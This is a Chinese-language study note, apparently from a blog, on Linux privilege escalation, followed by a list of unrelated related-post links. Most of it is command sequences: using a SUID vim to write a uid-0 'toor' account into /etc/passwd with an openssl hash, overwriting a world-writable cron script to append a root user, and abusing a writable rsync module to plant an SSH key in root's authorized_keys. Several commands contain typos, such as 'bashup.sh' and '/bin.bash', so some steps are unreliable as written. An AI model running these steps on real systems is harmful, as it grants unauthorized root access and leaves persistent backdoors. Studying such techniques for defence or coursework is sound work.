【学习笔记】常见的提权方式
提权:linux 内核提权 配置错误提权(用dirtycow提权)
windows 系统漏洞提权
msf
前提:已经通过nc -lvv 监听
find /usr/bin -perm -us=s usid权限文件查询
ls -la /usr/bin/passwd
看到-rwsr-xr-x 1 说明存在suid位
如何提权?用vim.basic提权(可以编辑root才能运行的文件)
然后用python -c 'import pty;pty.spawn("/bin/bash")' 交互式shell
vim /etc/passwd/
编辑格式:用户名:密码:uid:cid:注释:home目录:用户shell
然后退出vim :q!
openssl passwd -1 -salt asd 123 (生成带盐asd密码为123)
vim /etc/passwd
toor:这里复制密码:0:0:注释:/:/bin/sh
:wq! 强制写入
su toor
#id 查看权限
#exit
#crontab -
suid权限
a文件是root权限所属文件 且设置了suid权限 其他用户执行这个文件会以root用户权限执行
赋予suid权限:chmod +s 文件名
执行:sudo -su 用户名 文件名(看到root权限)
linux脏牛
寻找777权限的uid文件(即所有用户可以操作,修改这个文件,利用这个文件的内容进行提权)
ps au 查看所有进程(看到cron就是计划任务进程,然后看到/tmp/backup.sh任务脚本)
ls -la /tmp/backup.sh 查看文件的权限 (-rwxrwxrwx是777文件 r=4 w=2 x=1)
cd /tmp
cp backup.sh a.sh (备份bash.sh)
echo '#!/bin/bash' > backup.sh (一个>是覆盖原来的内容 两个>>是在尾部写入)
echo 'echo“密码”>> /etc/passwd' >> bashup.sh
cat /etc/passwd 看下是否成功写入
请求一个交互shell
su toor
#crontab -l 看下用户的计划任务
风险配置
利用系统错误配置提权
ps -ef (看到有开启rsync服务)
cat /etc/rsyncd.conf 看到rsync的配置文件
发现【files】中path=/ uid=root gid=root read only=no 意味着我们能用root权限查看根目录下所有文件
rsync 127.0.0.1::
rsync 127.0.0.1::文件名
cd /tmp
rm key*(生成公私钥)
ssh-keygen
ls -la(看到key的内容key和key.pub)
在linux下 如果我们的公钥出现在/root/.ssh/authorized_keys下 就可以用私钥登录了
rsync key.pub localhost::files/root/.ssh/authorized_keys
python -c 'import pty;pty.spawn("/bin.bash")'
ssh localhost -lroot -i key(这里私钥位置)
id 看用户权限
【学习笔记】常见的提权方式相关推荐
- 学习笔记_使用二进制的方式修改图片
学习笔记_使用二进制的方式修改图片 1.学习目标 2.学习工具 3.开始操作 3.1 了解图片是怎样用二进制表示的 3.2 开始操作 4.参考文档 1.学习目标 掌握使用二进制的方式修改图片 了解BM ...
- [网络安全学习篇65]:提权
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- mybatis学习笔记--常见的错误
原文来自:<mybatis学习笔记--常见的错误> 昨天刚学了下mybatis,用的是3.2.2的版本,在使用过程中遇到了些小问题,现总结如下,会不断更新. 1.没有在configurat ...
- 一文带你掌握OBS的两种常见的鉴权方式
OBS提供了REST(Representational State Transfer)风格API,支持您通过HTTP/HTTPS请求调用.在调用OBS的API前,需要了解OBS的鉴权认证方式.本文就将 ...
- mysql提权方式linux_Linux提权的几种常用方式
本文转载自微信公众号「Bypass」,作者Bypass .转载本文请联系Bypass公众号. 在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行 ...
- 利用mysql的几种提权方式
利用mysql的几种提权方式 mof提权 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以sy ...
- TS学习笔记04 JS创建对象的方式
TS学习笔记04 JS创建对象的方式 首先我们回顾下JS中创建对象的方式 比如说我按照下面的创建了两个对象分别为stu1和stu2,比如说我现在想给这两个对象都添加一个新的方法,但是这两个对象 ...
- shell将报错信息写到mysql_利用mysql的几种提权方式
利用mysql的几种提权方式 mof提权 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以sy ...
- Seo:入门须知(八)外链提权方式
外链提权方式 新站 收录率80%引蜘蛛给发布的文章 www.xxx.com/news/1.html 1-3过程 1.针对性的发布文章链接 2.针对有用的内页去发布外链(聚合页和重要的文章页) 3.针对 ...
最新文章
- PHP最简单写文件记日志当前时间
- ABP理论学习之工作单元(Unit of Work)
- c++ #define
- 机器学习数据挖掘笔记_14(GMM-HMM语音识别简单理解)
- 汽车行业中的AUTOSAR与OSEK到底是什么,有什么区别
- 有关Java 锁原理
- linux下使用c进行线程操作
- 2006年9月全国计算机等级考试三级数据库技术笔试试卷(含有答案)
- PyTorch 学习笔记(五):Finetune和各层定制学习率
- 意大利不禁止华为;13 款 5G 手机时间表公布;亚马逊 CEO 遭威胁 | 极客头条
- win7重新安装后删除文件权限不够(小技巧)
- Java应用在docker环境配置容器健康检查
- Excel宏的录制和解密
- 流体力学——漩涡运动
- virtualBox 报VT-x is disabled in the BIOS for both all CPU modes (VERR_VMX_MSR_ALL_VMX_DI的错误
- Android Studio操作
- 为了完美的“糖葫芦”,我坚决选择git rebase
- 如何将多个doc文档合并在一起
- 红包封面发货平台 卡密系统 全新红包封面平台 可搭建分站 独立后台的源码
- css3.0参考手册
热门文章
- 记一次难忘的数据恢复的经历
- JiaThis社区分享按钮的使用,提升网站访问流量
- openocd的源码学习4
- hive on te,mr,spark性能测试
- 【Python】新浪博客爬虫
- Ubuntu 安装搜狗输入法及Clion无法使用问题
- 卫生部办公厅关于印发《与食用受污染三鹿牌婴幼儿配方奶粉相关的婴幼儿泌尿系统结石诊疗方案》的通知...
- DayuCMS 1.525 /include/global.func.php Foreground Arbitrary Code Execution
- 编译Android版本的Poco库
- Fins协议-欧姆龙PLC数据采集读写操作上位机软件工具